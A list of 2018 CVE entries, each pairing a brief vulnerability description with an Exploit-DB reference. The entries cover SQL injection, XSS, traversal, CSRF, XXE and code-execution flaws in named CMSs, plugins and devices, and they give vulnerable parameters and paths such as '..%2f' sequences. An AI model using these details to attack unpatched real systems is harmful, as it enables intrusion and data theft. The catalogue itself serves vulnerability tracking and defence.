# CVE-2018
CVECVE DescriptionReference
CVE-2018-1000811bludit version 3.0.0 contains a Unrestricted Upload of File with Dangerous Type vulnerability in Content Upload in Pages Editor that can result in Remote Command Execution. This attack appear to be exploitable via malicious user have to upload a crafted payload containing PHP code.https://www.exploit-db.com/exploits/46060
CVE-2018-20418index.php?p=admin/actions/entries/save-entry in Craft CMS 3.0.25 allows XSS by saving a new title from the console tab.https://www.exploit-db.com/exploits/46054
CVE-2018-1821IBM Operational Decision Management 8.5, 8.6, 8.7, 8.8, and 8.9 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150170.https://www.exploit-db.com/exploits/46017
CVE-2018-13045SQL injection vulnerability in the "Bazar" page in Yeswiki Cercopitheque 2018-06-19-1 and earlier allows attackers to execute arbitrary SQL commands via the "id" parameter.https://www.exploit-db.com/exploits/46015
CVE-2018-19933Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.https://www.exploit-db.com/exploits/46014
CVE-2018-19829Artica Integria IMS 5.0.83 has CSRF in godmode/usuarios/lista_usuarios, resulting in the ability to delete an arbitrary user when the ID number is known.https://www.exploit-db.com/exploits/46013
CVE-2018-19828Artica Integria IMS 5.0.83 has XSS via the search_string parameter.https://www.exploit-db.com/exploits/46012
CVE-2018-15535/filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.https://www.exploit-db.com/exploits/45271
CVE-2018-15877The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.https://www.exploit-db.com/exploits/45274
CVE-2018-15745Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.https://www.exploit-db.com/exploits/45296
CVE-2018-16133Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal via a ../ in the URI.https://www.exploit-db.com/exploits/45303
CVE-2018-16134Cybrotech CyBroHttpServer 1.0.3 allows XSS via a URI.https://www.exploit-db.com/exploits/45309
CVE-2018-15844An issue was discovered in DamiCMS 6.0.0. There is an CSRF vulnerability that can revise the administrator account's password via /admin.php?s=/Admin/doedit.https://www.exploit-db.com/exploits/45314
CVE-2018-14497Tenda D152 ADSL routers allow XSS via a crafted SSID.https://www.exploit-db.com/exploits/45336
CVE-2018-15917Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.https://www.exploit-db.com/exploits/45338
CVE-2018-15918An issue was discovered in Jorani 0.6.5. SQL Injection (error-based) allows a user of the application without permissions to read and modify sensitive information from the database used by the application via the startdate or enddate parameter to leaves/validate.https://www.exploit-db.com/exploits/45340
CVE-2018-16059Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.https://www.exploit-db.com/exploits/45342
CVE-2018-10763Multiple cross-site scripting (XSS) vulnerabilities in Synametrics SynaMan 4.0 build 1488 via the (1) Main heading or (2) Sub heading fields in the Partial Branding configuration page.https://www.exploit-db.com/exploits/45386
CVE-2018-1756IBM Security Identity Governance and Intelligence 5.2.3.2 and 5.2.4 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, information in the back-end database. IBM X-Force ID: 148599.https://www.exploit-db.com/exploits/45392
CVE-2018-1306The PortletV3AnnotatedDemo Multipart Portlet war file code provided in Apache Pluto version 3.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to restrict path information provided during a file upload. An attacker could exploit this vulnerability to obtain configuration data and other sensitive information.https://www.exploit-db.com/exploits/45396
CVE-2018-17254The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.https://www.exploit-db.com/exploits/45423
CVE-2018-1002000There is blind SQL injection in WordPress Arigato Autoresponder and Newsletter v2.5.1.8 These vulnerabilities require administrative privileges to exploit. There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request.https://www.exploit-db.com/exploits/45434
CVE-2018-1002001There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit.https://www.exploit-db.com/exploits/45434
CVE-2018-1002002There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit.https://www.exploit-db.com/exploits/45434
CVE-2018-1002003There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit.https://www.exploit-db.com/exploits/45434
CVE-2018-1002004There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit.https://www.exploit-db.com/exploits/45434
CVE-2018-1002005These vulnerabilities require administrative privileges to exploit. There is an XSS vulnerability in bft_list.html.php:43: via the filter_signup_date parameter.https://www.exploit-db.com/exploits/45434
CVE-2018-1002006These vulnerabilities require administrative privileges to exploit. There is an XSS vulnerability in integration-contact-form.html.php:14: via POST request variable classeshttps://www.exploit-db.com/exploits/45434
CVE-2018-1002007There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in integration-contact-form.html.php:15: via POST request variable html_id.https://www.exploit-db.com/exploits/45434
CVE-2018-1002008There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in list-user.html.php:4: via GET request offset variable.https://www.exploit-db.com/exploits/45434
CVE-2018-1002009There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and News letter v2.5.1.8 This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in unsubscribe.html.php:3: via GET reuqest to the email variable.https://www.exploit-db.com/exploits/45434
CVE-2018-16736In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the _whatfilter and _messages parameters (in the Filters section of the settings).https://www.exploit-db.com/exploits/45437
CVE-2018-16283The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter.https://www.exploit-db.com/exploits/45438
CVE-2018-16299The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.https://www.exploit-db.com/exploits/45439
CVE-2018-17255Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2020-14014. Reason: This candidate is a reservation duplicate of CVE-2020-14014. Notes: All CVE users should reference CVE-2020-14014 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usagehttps://www.exploit-db.com/exploits/45445
CVE-2018-16288LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.https://www.exploit-db.com/exploits/45440
CVE-2018-17173LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.https://www.exploit-db.com/exploits/45448
CVE-2018-17128A Persistent XSS issue was discovered in the Visual Editor in MyBB before 1.8.19 via a Video MyCode.https://www.exploit-db.com/exploits/45449
CVE-2018-17391SQL Injection exists in authors_post.php in Super Cms Blog Pro 1.0 via the author parameter.https://www.exploit-db.com/exploits/45463
CVE-2018-17379SQL Injection exists in the Raffle Factory 3.5.2 component for Joomla! via the filter_order_Dir or filter_order parameter.https://www.exploit-db.com/exploits/45464
CVE-2018-2791Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). Supported versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).https://www.exploit-db.com/exploits/44752
CVE-2018-11415SAP Internet Transaction Server (ITS) 6200.X.X has Reflected Cross Site Scripting (XSS) via certain wgate URIs. NOTE: the vendor has reportedly indicated that there will not be any further releases of this product.https://www.exploit-db.com/exploits/44755
CVE-2018-7312SQL Injection exists in the Alexandria Book Library 3.1.2 component for Joomla! via the letter parameter.https://www.exploit-db.com/exploits/44162
CVE-2018-7318SQL Injection exists in the CheckList 1.1.1 component for Joomla! via the title_search, tag_search, name_search, description_search, or filter_order parameter.https://www.exploit-db.com/exploits/44163
CVE-2018-6222Arbitrary logs location in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to change location of log files and be manipulated to execute arbitrary commands and attain command execution on a vulnerable system.https://www.exploit-db.com/exploits/44166
CVE-2018-6223A missing authentication for appliance registration vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to manipulate the registration process of the product to reset configuration parameters.https://www.exploit-db.com/exploits/44166
CVE-2018-6225An XML external entity injection (XXE) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an authenticated user to expose a normally protected configuration script.https://www.exploit-db.com/exploits/44166
CVE-2018-6226Reflected cross-site scripting (XSS) vulnerabilities in two Trend Micro Email Encryption Gateway 5.5 configuration files could allow an attacker to inject client-side scripts into vulnerable systems.https://www.exploit-db.com/exploits/44166
CVE-2018-6227A stored cross-site scripting (XSS) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to inject client-side scripts into vulnerable systems.https://www.exploit-db.com/exploits/44166
CVE-2018-6228A SQL injection vulnerability in a Trend Micro Email Encryption Gateway 5.5 policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.https://www.exploit-db.com/exploits/44166
CVE-2018-6229A SQL injection vulnerability in an Trend Micro Email Encryption Gateway 5.5 edit policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.https://www.exploit-db.com/exploits/44166
CVE-2018-7600Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.https://www.exploit-db.com/exploits/44449
CVE-2018-6230A SQL injection vulnerability in an Trend Micro Email Encryption Gateway 5.5 search configuration script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.https://www.exploit-db.com/exploits/44166
CVE-2018-7477SQL Injection exists in PHP Scripts Mall School Management Script 3.0.4 via the Username and Password fields to parents/Parent_module/parent_login.php.https://www.exploit-db.com/exploits/44191
CVE-2018-7448Remote code execution vulnerability in /cmsms-2.1.6-install.php/index.php in CMS Made Simple version 2.1.6 allows remote attackers to inject arbitrary PHP code via the "timezone" parameter in step 4 of a fresh installation procedure.https://www.exploit-db.com/exploits/44192
CVE-2018-6193A Cross-Site Scripting (XSS) vulnerability was found in Routers2 2.24, affecting the 'rtr' GET parameter in a page=graph action to cgi-bin/routers2.pl.https://www.exploit-db.com/exploits/44216
CVE-2018-6936Cross Site Scripting (XSS) exists on the D-Link DIR-600M C1 3.01 via the SSID or the name of a user account.https://www.exploit-db.com/exploits/44219
CVE-2018-7490uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal.https://www.exploit-db.com/exploits/44223
CVE-2018-7474An issue was discovered in Textpattern CMS 4.6.2 and earlier. It is possible to inject SQL code in the variable "qty" on the page index.php.https://www.exploit-db.com/exploits/44277
CVE-2018-7703Cross-site scripting (XSS) vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote attackers to inject arbitrary web script or HTML via the mailboxid parameter to secmail/getmessage.exe.https://www.exploit-db.com/exploits/44285
CVE-2018-7705Directory traversal vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read e-mail messages to arbitrary recipients via a .. (dot dot) in the filename parameter to secupload2/upload.aspx.https://www.exploit-db.com/exploits/44285
CVE-2018-7701Multiple cross-site request forgery (CSRF) vulnerabilities in SecurEnvoy SecurMail before 9.2.501 allow remote attackers to hijack the authentication of arbitrary users for requests that (1) delete e-mail messages via a delete action in a request to secmail/getmessage.exe or (2) spoof arbitrary users and reply to their messages via a request to secserver/securectrl.exe.https://www.exploit-db.com/exploits/44285
CVE-2018-7538SQL injection vulnerability in the tracker functionality of Enalean Tuleap software engineering platform before 9.18 allows attackers to execute arbitrary SQL commands.https://www.exploit-db.com/exploits/44286
CVE-2018-7543Cross-site scripting (XSS) vulnerability in installer/build/view.step4.php of the SnapCreek Duplicator plugin 1.2.32 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the json parameter.https://www.exploit-db.com/exploits/44288
CVE-2018-8772Coship RT3052 4.0.0.48 devices allow XSS via a crafted SSID field on the "Wireless Setting - Basic" screen.https://www.exploit-db.com/exploits/44320
CVE-2018-7422A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php, aka absolute path traversal.https://www.exploit-db.com/exploits/44340
CVE-2018-7171Directory traversal vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to share the contents of arbitrary directories via a .. (dot dot) in the contentbase parameter to rpc/set_all.https://www.exploit-db.com/exploits/44350
CVE-2018-7203Cross-site scripting (XSS) vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to inject arbitrary web script or HTML via the friendlyname parameter to rpc/set_all.https://www.exploit-db.com/exploits/44351
CVE-2018-0878Windows Remote Assistance in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an information disclosure vulnerability due to how XML External Entities (XXE) are processed, aka "Windows Remote Assistance Information Disclosure Vulnerability".https://www.exploit-db.com/exploits/44352
CVE-2018-8903Open-AudIT Professional 2.1 allows XSS via the Name or Description field on the Credentials screen.https://www.exploit-db.com/exploits/44354
CVE-2018-8979Open-AudIT Professional 2.1 has CSRF, as demonstrated by modifying a user account or inserting XSS sequences via the credentials URI.https://www.exploit-db.com/exploits/44360
CVE-2018-9034Cross-site scripting (XSS) vulnerability in lib/interface.php of the Relevanssi plugin 4.0.4 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the tab GET parameter.https://www.exploit-db.com/exploits/44366
CVE-2018-9035CSV Injection vulnerability in ExportToCsvUtf8.php of the Contact Form 7 to Database Extension plugin 2.10.32 for WordPress allows remote attackers to inject spreadsheet formulas into CSV files via the contact form.https://www.exploit-db.com/exploits/44367
CVE-2018-7297Remote Code Execution in the TCL script interpreter in eQ-3 AG Homematic CCU2 2.29.2 and earlier allows remote attackers to obtain read/write access and execute system commands on the device. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.https://www.exploit-db.com/exploits/44368
CVE-2018-9107CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcyMailing extension before 5.9.6 for Joomla! via a value that is mishandled in a CSV export.https://www.exploit-db.com/exploits/44369
CVE-2018-9106CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcySMS extension before 3.5.1 for Joomla! via a value that is mishandled in a CSV export.https://www.exploit-db.com/exploits/44370
CVE-2018-5708An issue was discovered on D-Link DIR-601 B1 2.02NA devices. Being on the same local network as, but being unauthenticated to, the administrator's panel, a user can obtain the admin username and cleartext password in the response (specifically, the configuration file restore_default), which is displayed in XML.https://www.exploit-db.com/exploits/44388
CVE-2018-8815Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or HTML via a malicious SVG image.https://www.exploit-db.com/exploits/44392
CVE-2018-9183The Joom Sky JS Jobs extension before 1.2.1 for Joomla! has XSS.https://www.exploit-db.com/exploits/44401
CVE-2018-7653In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.https://www.exploit-db.com/exploits/44405
CVE-2018-7736In Z-BlogPHP 1.5.1.1740, cmd.php has XSS via the ZC_BLOG_SUBNAME parameter or ZC_UPLOAD_FILETYPE parameter. NOTE: the software maintainer disputes that this is a vulnerabilityhttps://www.exploit-db.com/exploits/44406
CVE-2018-9173Cross-site scripting (XSS) vulnerability in admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13 allows remote attackers to inject arbitrary web script or HTML, as demonstrated by the movieName parameter.https://www.exploit-db.com/exploits/44408
CVE-2018-8729Multiple cross-site scripting (XSS) vulnerabilities in the Activity Log plugin before 2.4.1 for WordPress allow remote attackers to inject arbitrary JavaScript or HTML via a title that is not escaped.https://www.exploit-db.com/exploits/44409
CVE-2018-7746An issue was discovered in Western Bridge Cobub Razor 0.7.2. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.https://www.exploit-db.com/exploits/44416
CVE-2018-9238proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.https://www.exploit-db.com/exploits/44424
CVE-2018-9235iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query parameter to search.php.https://www.exploit-db.com/exploits/44434
CVE-2018-9236iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site title" field.https://www.exploit-db.com/exploits/44436
CVE-2018-9237iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" field.https://www.exploit-db.com/exploits/44436
CVE-2018-8729Multiple cross-site scripting (XSS) vulnerabilities in the Activity Log plugin before 2.4.1 for WordPress allow remote attackers to inject arbitrary JavaScript or HTML via a title that is not escaped.https://www.exploit-db.com/exploits/44437
CVE-2018-1217Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.https://www.exploit-db.com/exploits/44441
CVE-2018-9172The Iptanus WordPress File Upload plugin before 4.3.3 for WordPress mishandles shortcode attributes.https://www.exploit-db.com/exploits/44443
CVE-2018-9844The Iptanus WordPress File Upload plugin before 4.3.4 for WordPress mishandles Settings attributes, leading to XSS.https://www.exploit-db.com/exploits/44444
CVE-2018-10063The Convert Forms extension before 2.0.4 for Joomla! is vulnerable to Remote Command Execution using CSV Injection that is mishandled when exporting a Leads file.https://www.exploit-db.com/exploits/44447
CVE-2018-8057A SQL Injection vulnerability exists in Western Bridge Cobub Razor 0.8.0 via the channel_name or platform parameter in a /index.php?/manage/channel/addchannel request, related to /application/controllers/manage/channel.php.https://www.exploit-db.com/exploits/44454
CVE-2018-9857PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to searchbyid.php (aka the "View Search By Id" screen).https://www.exploit-db.com/exploits/44486
CVE-2018-8831A Persistent XSS vulnerability exists in Kodi (formerly XBMC) through 17.6 that allows the execution of arbitrary HTML/script code in the context of the victim user's browser via a playlist.https://www.exploit-db.com/exploits/44487
CVE-2018-7747Multiple cross-site scripting (XSS) vulnerabilities in the Caldera Forms plugin before 1.6.0-rc.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a greeting message, (2) the email transaction log, or (3) an imported form.https://www.exploit-db.com/exploits/44489
CVE-2018-10077XML external entity (XXE) vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to read arbitrary files via crafted XML data.https://www.exploit-db.com/exploits/44493
CVE-2018-10078Cross-site scripting (XSS) vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via a server description.https://www.exploit-db.com/exploits/44493
CVE-2018-3811SQL Injection vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to execute SQL queries in the context of the web server. The saveGoogleAdWords() function in smartgooglecode.php did not use prepared statements and did not sanitize the $_POST["oId"] variable before passing it as input into the SQL query.https://www.exploit-db.com/exploits/43420
CVE-2018-5315The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection via the event_id parameter to event.php.https://www.exploit-db.com/exploits/43479
CVE-2018-5263The StackIdeas EasyDiscuss (aka com_easydiscuss) extension before 4.0.21 for Joomla! allows XSS.https://www.exploit-db.com/exploits/43488
CVE-2018-5370BizLogic xnami 1.0 has XSS via the comment parameter in an addComment action to the /media/ajax URI.https://www.exploit-db.com/exploits/43535
CVE-2018-5479FoxSash ImgHosting 1.5 (according to footer information) is vulnerable to XSS attacks. The affected function is its search engine via the search parameter to the default URI. Since there is an user/admin login interface, it's possible for attackers to steal sessions of users and thus admin(s). By sending users an infected URL, code will be executed.https://www.exploit-db.com/exploits/43567
CVE-2018-5688ILIAS before 5.2.4 has XSS via the cmd parameter to the displayHeader function in setup/classes/class.ilSetupGUI.php in the Setup component.https://www.exploit-db.com/exploits/43595
CVE-2018-5705Reservo Image Hosting 1.6 is vulnerable to XSS attacks. The affected function is its search engine (the t parameter to the /search URI). Since there is an user/admin login interface, it's possible for attackers to steal sessions of users and thus admin(s). By sending users an infected URL, code will be executed.https://www.exploit-db.com/exploits/43676
CVE-2018-5715phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).https://www.exploit-db.com/exploits/43683
CVE-2018-5985SQL Injection exists in the LiveCRM SaaS Cloud 1.0 component for Joomla! via an r=site/login&company_id= request.https://www.exploit-db.com/exploits/43860
CVE-2018-5977SQL Injection exists in Affiligator Affiliate Webshop Management System 2.1.0 via a search/?q=&price_type=range&price= request.https://www.exploit-db.com/exploits/43861
CVE-2018-5986SQL Injection exists in Easy Car Script 2014 via the s_order or s_row parameter to site_search.php.https://www.exploit-db.com/exploits/43863
CVE-2018-5979SQL Injection exists in Wchat Fully Responsive PHP AJAX Chat Script 1.5 via the login.php User field.https://www.exploit-db.com/exploits/43864
CVE-2018-5978SQL Injection exists in Facebook Style Php Ajax Chat Zechat 1.5 via the login.php User field.https://www.exploit-db.com/exploits/43865
CVE-2018-5972SQL Injection exists in Classified Ads CMS Quickad 4.0 via the keywords, placeid, cat, or subcat parameter to the listing URI.https://www.exploit-db.com/exploits/43868
CVE-2018-5988SQL Injection exists in Flexible Poll 1.2 via the id parameter to mobile_preview.php or index.php.https://www.exploit-db.com/exploits/43869
CVE-2018-5973SQL Injection exists in Professional Local Directory Script 1.0 via the sellers_subcategories.php IndustryID parameter, or the suppliers.php IndustryID or CategoryID parameter.https://www.exploit-db.com/exploits/43870
CVE-2018-6363SQL Injection exists in Task Rabbit Clone 1.0 via the single_blog.php id parameter.https://www.exploit-db.com/exploits/43914
CVE-2018-6365SQL Injection exists in TSiteBuilder 1.0 via the id parameter to /site.php, /pagelist.php, or /page_new.php.https://www.exploit-db.com/exploits/43915
CVE-2018-6367SQL Injection exists in Vastal I-Tech Buddy Zone Facebook Clone 2.9.9 via the /chat_im/chat_window.php request_id parameter or the /search_events.php category parameter.https://www.exploit-db.com/exploits/43918
CVE-2018-6364SQL Injection exists in Multilanguage Real Estate MLM Script through 3.0 via the /product-list.php srch parameter.https://www.exploit-db.com/exploits/43917
CVE-2018-6398SQL Injection exists in the CP Event Calendar 3.0.1 component for Joomla! via the id parameter in a task=load action.https://www.exploit-db.com/exploits/43932
CVE-2018-6395SQL Injection exists in the Visual Calendar 3.1.3 component for Joomla! via the id parameter in a view=load action.https://www.exploit-db.com/exploits/43933
CVE-2018-6577SQL Injection exists in the JEXTN Membership 3.1.0 component for Joomla! via the usr_plan parameter in a view=myplans&task=myplans.usersubscriptions request.https://www.exploit-db.com/exploits/43940
CVE-2018-6578SQL Injection exists in the JE PayperVideo 3.0.0 component for Joomla! via the usr_plan parameter in a view=myplans&task=myplans.usersubscriptions request.https://www.exploit-db.com/exploits/43948
CVE-2018-6576SQL Injection exists in Event Manager 1.0 via the event.php id parameter or the page.php slug parameter.https://www.exploit-db.com/exploits/43949
CVE-2018-6579SQL Injection exists in the JEXTN Reverse Auction 3.1.0 component for Joomla! via a view=products&uid= request.https://www.exploit-db.com/exploits/43950
CVE-2018-6575SQL Injection exists in the JEXTN Classified 1.0.0 component for Joomla! via a view=boutique&sid= request.https://www.exploit-db.com/exploits/43957
CVE-2018-6581SQL Injection exists in the JMS Music 1.1.1 component for Joomla! via a search with the keyword, artist, or username parameter.https://www.exploit-db.com/exploits/43959
CVE-2018-6605SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.https://www.exploit-db.com/exploits/43974
CVE-2018-6604SQL Injection exists in the Zh YandexMap 6.2.1.0 component for Joomla! via the id parameter in a task=getPlacemarkDetails request.https://www.exploit-db.com/exploits/43975
CVE-2018-6582SQL Injection exists in the Zh GoogleMap 8.4.0.0 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.https://www.exploit-db.com/exploits/43976
CVE-2018-6609SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist (or prioritylist) edit action.https://www.exploit-db.com/exploits/43978
CVE-2018-6190Netis WF2419 V3.2.41381 devices allow XSS via the Description field on the MAC Filtering page.https://www.exploit-db.com/exploits/43981
CVE-2018-6845PHP Scripts Mall Multi Language Olx Clone Script 2.0.6 has XSS via the Leave Comment field.https://www.exploit-db.com/exploits/44016
CVE-2018-6888An issue was discovered in Typesetter 5.1. The User Permissions page (aka Admin/Users) suffers from critical flaw of Cross Site Request forgery: using a forged HTTP request, a malicious user can lead a user to unknowingly create / delete or modify a user account due to the lack of an anti-CSRF token.https://www.exploit-db.com/exploits/44029
CVE-2018-6940A /shell?cmd= XSS issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution in conjunction with CSRF.https://www.exploit-db.com/exploits/44033
CVE-2018-5993SQL Injection exists in the Aist through 2.0 component for Joomla! via the id parameter in a view=showvacancy request.https://www.exploit-db.com/exploits/44106
CVE-2018-5990SQL Injection exists in the AllVideos Reloaded 1.2.x component for Joomla! via the divid parameter.https://www.exploit-db.com/exploits/44107
CVE-2018-6584SQL Injection exists in the DT Register 3.2.7 component for Joomla! via a task=edit&id= request.https://www.exploit-db.com/exploits/44108
CVE-2018-6373SQL Injection exists in the Fastball 2.5 component for Joomla! via the season parameter in a view=player action.https://www.exploit-db.com/exploits/44109
CVE-2018-6004SQL Injection exists in the File Download Tracker 3.0 component for Joomla! via the dynfield[phone] or sess parameter.https://www.exploit-db.com/exploits/44110
CVE-2018-5991SQL Injection exists in the Form Maker 3.6.12 component for Joomla! via the id, from, or to parameter in a view=stats request, a different vulnerability than CVE-2015-2798.https://www.exploit-db.com/exploits/44111
CVE-2018-5981SQL Injection exists in the Gallery WD 1.3.6 component for Joomla! via the tag_id parameter or gallery_id parameter.https://www.exploit-db.com/exploits/44112
CVE-2018-6396SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.https://www.exploit-db.com/exploits/44113
CVE-2018-6394SQL Injection exists in the InviteX 3.0.5 component for Joomla! via the invite_type parameter in a view=invites action.https://www.exploit-db.com/exploits/44114
CVE-2018-6372SQL Injection exists in the JB Bus 2.3 component for Joomla! via the order_number parameter.https://www.exploit-db.com/exploits/44115
CVE-2018-5970SQL Injection exists in the JGive 2.0.9 component for Joomla! via the filter_org_ind_type or campaign_countries parameter.https://www.exploit-db.com/exploits/44116
CVE-2018-6368SQL Injection exists in the JomEstate PRO through 3.7 component for Joomla! via the id parameter in a task=detailed action.https://www.exploit-db.com/exploits/44117
CVE-2018-6006SQL Injection exists in the JS Autoz 1.0.9 component for Joomla! via the vtype, pre, or prs parameter.https://www.exploit-db.com/exploits/44119
CVE-2018-5994SQL Injection exists in the JS Jobs 1.1.9 component for Joomla! via the zipcode parameter in a newest-jobs request, or the ta parameter in a view_resume request.https://www.exploit-db.com/exploits/44120
CVE-2018-5971SQL Injection exists in the MediaLibrary Free 4.0.12 component for Joomla! via the id parameter or the mid array parameter.https://www.exploit-db.com/exploits/44122
CVE-2018-6024SQL Injection exists in the Project Log 1.5.3 component for Joomla! via the search parameter.https://www.exploit-db.com/exploits/44124
CVE-2018-6005SQL Injection exists in the Realpin through 1.5.04 component for Joomla! via the pinboard parameter.https://www.exploit-db.com/exploits/44125
CVE-2018-5974SQL Injection exists in the SimpleCalendar 3.1.9 component for Joomla! via the catid array parameter.https://www.exploit-db.com/exploits/44126
CVE-2018-5975SQL Injection exists in the Smart Shoutbox 3.0.0 component for Joomla! via the shoutauthor parameter to the archive URI.https://www.exploit-db.com/exploits/44127
CVE-2018-5980SQL Injection exists in the Solidres 2.5.1 component for Joomla! via the direction parameter in a hub.search action.https://www.exploit-db.com/exploits/44128
CVE-2018-5992SQL Injection exists in the Staff Master through 1.0 RC 1 component for Joomla! via the name parameter in a view=staff request.https://www.exploit-db.com/exploits/44129
